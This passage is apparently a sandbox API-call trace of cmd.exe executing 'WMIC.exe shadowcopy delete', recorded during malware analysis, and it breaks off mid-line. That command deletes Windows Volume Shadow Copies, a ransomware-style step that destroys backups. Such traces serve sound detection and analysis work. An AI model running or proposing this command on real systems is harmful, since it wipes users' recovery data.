lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x1, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.100] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x1, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.100] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x0, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.100] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x40, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x40, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x40, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.101] RegCloseKey (hKey=0x44) returned 0x0 [0041.101] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ed28 | out: phkResult=0x16ed28*=0x44) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x40, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x1, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x1, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x0, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x9, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x4, lpData=0x16ed40*=0x9, lpcbData=0x16ed24*=0x4) returned 0x0 [0041.101] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed20, lpData=0x16ed40, lpcbData=0x16ed24*=0x1000 | out: lpType=0x16ed20*=0x0, lpData=0x16ed40*=0x9, lpcbData=0x16ed24*=0x1000) returned 0x2 [0041.101] RegCloseKey (hKey=0x44) returned 0x0 [0041.101] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2d8d4b [0041.101] srand (_Seed=0x5d2d8d4b) [0041.101] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C WMIC.exe shadowcopy delete " [0041.101] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C WMIC.exe shadowcopy delete " [0041.101] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.101] GetProcessHeap () returned 0x330000 [0041.101] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x34aaa0 [0041.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x34aab0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0041.102] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.102] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.102] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0041.102] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0041.102] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0041.102] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0041.102] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0041.102] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0041.102] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0041.102] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0041.102] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0041.102] GetProcessHeap () returned 0x330000 [0041.102] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x349580 | out: hHeap=0x330000) returned 1 [0041.102] GetEnvironmentStringsW () returned 0x348af0* [0041.102] GetProcessHeap () returned 0x330000 [0041.102] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa94) returned 0x34b760 [0041.102] FreeEnvironmentStringsW (penv=0x348af0) returned 1 [0041.102] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.102] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0041.102] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0041.102] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0041.103] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0041.103] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0041.103] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0041.103] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0041.103] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0041.103] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0041.103] GetProcessHeap () returned 0x330000 [0041.103] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x5c) returned 0x331320 [0041.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fb30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16fb30, lpFilePart=0x16fb10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16fb10*="Desktop") returned 0x25 [0041.103] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.103] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f840 | out: lpFindFileData=0x16f840*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Users", cAlternateFileName="")) returned 0x348950 [0041.103] FindClose (in: hFindFile=0x348950 | out: hFindFile=0x348950) returned 1 [0041.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f840 | out: lpFindFileData=0x16f840*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x348950 [0041.103] FindClose (in: hFindFile=0x348950 | out: hFindFile=0x348950) returned 1 [0041.103] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0041.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f840 | out: lpFindFileData=0x16f840*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Desktop", cAlternateFileName="")) returned 0x348950 [0041.103] FindClose (in: hFindFile=0x348950 | out: hFindFile=0x348950) returned 1 [0041.104] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0041.104] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0041.104] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0041.104] GetProcessHeap () returned 0x330000 [0041.104] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34b760 | out: hHeap=0x330000) returned 1 [0041.104] GetEnvironmentStringsW () returned 0x348af0* [0041.104] GetProcessHeap () returned 0x330000 [0041.104] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x34acc0 [0041.104] FreeEnvironmentStringsW (penv=0x348af0) returned 1 [0041.104] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0041.104] GetProcessHeap () returned 0x330000 [0041.104] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x331320 | out: hHeap=0x330000) returned 1 [0041.104] GetProcessHeap () returned 0x330000 [0041.104] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4016) returned 0x34ccf0 [0041.104] GetProcessHeap () returned 0x330000 [0041.104] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4c) returned 0x348950 [0041.104] GetProcessHeap () returned 0x330000 [0041.104] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ccf0 | out: hHeap=0x330000) returned 1 [0041.104] GetConsoleOutputCP () returned 0x1b5 [0041.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1 [0041.105] GetUserDefaultLCID () returned 0x409 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fc40, cchData=128 | out: lpLCData="0") returned 2 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fc40, cchData=128 | out: lpLCData="0") returned 2 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fc40, cchData=128 | out: lpLCData="1") returned 2 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0041.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2 [0041.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0041.106] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0041.106] GetProcessHeap () returned 0x330000 [0041.106] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x34b820 [0041.106] GetConsoleTitleW (in: lpConsoleTitle=0x34b820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0041.107] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0041.107] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0041.107] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0041.107] GetProcessHeap () returned 0x330000 [0041.107] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4012) returned 0x34ccf0 [0041.107] GetProcessHeap () returned 0x330000 [0041.107] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ccf0 | out: hHeap=0x330000) returned 1 [0041.108] _wcsicmp (_String1="WMIC.exe", _String2=")") returned 78 [0041.108] _wcsicmp (_String1="FOR", _String2="WMIC.exe") returned -17 [0041.108] _wcsicmp (_String1="FOR/?", _String2="WMIC.exe") returned -17 [0041.108] _wcsicmp (_String1="IF", _String2="WMIC.exe") returned -14 [0041.108] _wcsicmp (_String1="IF/?", _String2="WMIC.exe") returned -14 [0041.108] _wcsicmp (_String1="REM", _String2="WMIC.exe") returned -5 [0041.108] _wcsicmp (_String1="REM/?", _String2="WMIC.exe") returned -5 [0041.108] GetProcessHeap () returned 0x330000 [0041.108] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x34ba40 [0041.108] GetProcessHeap () returned 0x330000 [0041.108] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x22) returned 0x3445e0 [0041.108] GetProcessHeap () returned 0x330000 [0041.108] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x38) returned 0x346520 [0041.109] GetConsoleTitleW (in: lpConsoleTitle=0x16fb50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0041.109] GetFileAttributesW (lpFileName="WMIC.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmic.exe")) returned 0xffffffff [0041.109] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0041.109] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0041.109] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0041.109] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0041.109] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0041.109] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0041.109] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0041.110] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0041.110] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0041.110] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0041.110] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0041.110] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0041.110] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0041.110] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0041.110] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0041.110] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0041.110] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0041.110] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0041.110] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0041.110] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0041.110] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0041.110] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0041.110] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0041.110] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0041.110] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0041.110] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0041.110] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0041.110] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0041.110] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0041.110] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0041.110] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0041.110] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0041.110] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0041.110] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0041.110] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0041.110] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0041.110] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0041.110] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0041.110] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0041.110] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0041.110] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0041.110] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0041.110] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0041.110] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0041.110] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0041.110] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0041.111] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0041.111] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0041.111] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0041.111] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0041.111] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0041.111] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0041.111] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0041.111] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0041.111] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0041.111] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0041.111] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0041.111] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0041.111] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0041.111] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0041.111] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0041.111] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0041.111] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0041.111] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0041.111] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0041.111] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0041.111] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0041.111] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0041.111] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0041.111] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0041.111] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0041.111] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0041.111] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0041.111] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0041.111] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0041.111] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0041.111] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0041.111] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0041.111] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0041.112] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0041.112] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0041.112] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0041.112] GetProcessHeap () returned 0x330000 [0041.112] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x34bb00 [0041.112] GetProcessHeap () returned 0x330000 [0041.112] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4a) returned 0x34bd20 [0041.112] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0041.112] GetProcessHeap () returned 0x330000 [0041.112] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x420) returned 0x34bd80 [0041.112] SetErrorMode (uMode=0x0) returned 0x0 [0041.112] SetErrorMode (uMode=0x1) returned 0x0 [0041.113] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x34bd90, lpFilePart=0x16f3e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f3e0*="Desktop") returned 0x25 [0041.113] SetErrorMode (uMode=0x0) returned 0x1 [0041.113] GetProcessHeap () returned 0x330000 [0041.113] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x34bd80, Size=0x6e) returned 0x34bd80 [0041.113] GetProcessHeap () returned 0x330000 [0041.113] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x34bd80) returned 0x6e [0041.113] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0041.113] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.113] GetProcessHeap () returned 0x330000 [0041.113] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x128) returned 0x34be00 [0041.113] GetProcessHeap () returned 0x330000 [0041.113] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x240) returned 0x34bf30 [0041.119] GetProcessHeap () returned 0x330000 [0041.119] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x34bf30, Size=0x12a) returned 0x34bf30 [0041.119] GetProcessHeap () returned 0x330000 [0041.119] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x34bf30) returned 0x12a [0041.119] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.119] GetProcessHeap () returned 0x330000 [0041.119] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe8) returned 0x34c070 [0041.119] GetProcessHeap () returned 0x330000 [0041.119] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x34c070, Size=0x7e) returned 0x34c070 [0041.119] GetProcessHeap () returned 0x330000 [0041.119] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x34c070) returned 0x7e [0041.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.120] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.120] GetLastError () returned 0x2 [0041.120] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.120] GetLastError () returned 0x2 [0041.120] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.120] GetLastError () returned 0x2 [0041.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.121] GetLastError () returned 0x2 [0041.121] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.121] GetLastError () returned 0x2 [0041.121] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.156] GetLastError () returned 0x2 [0041.156] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.156] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f150) returned 0xffffffffffffffff [0041.157] 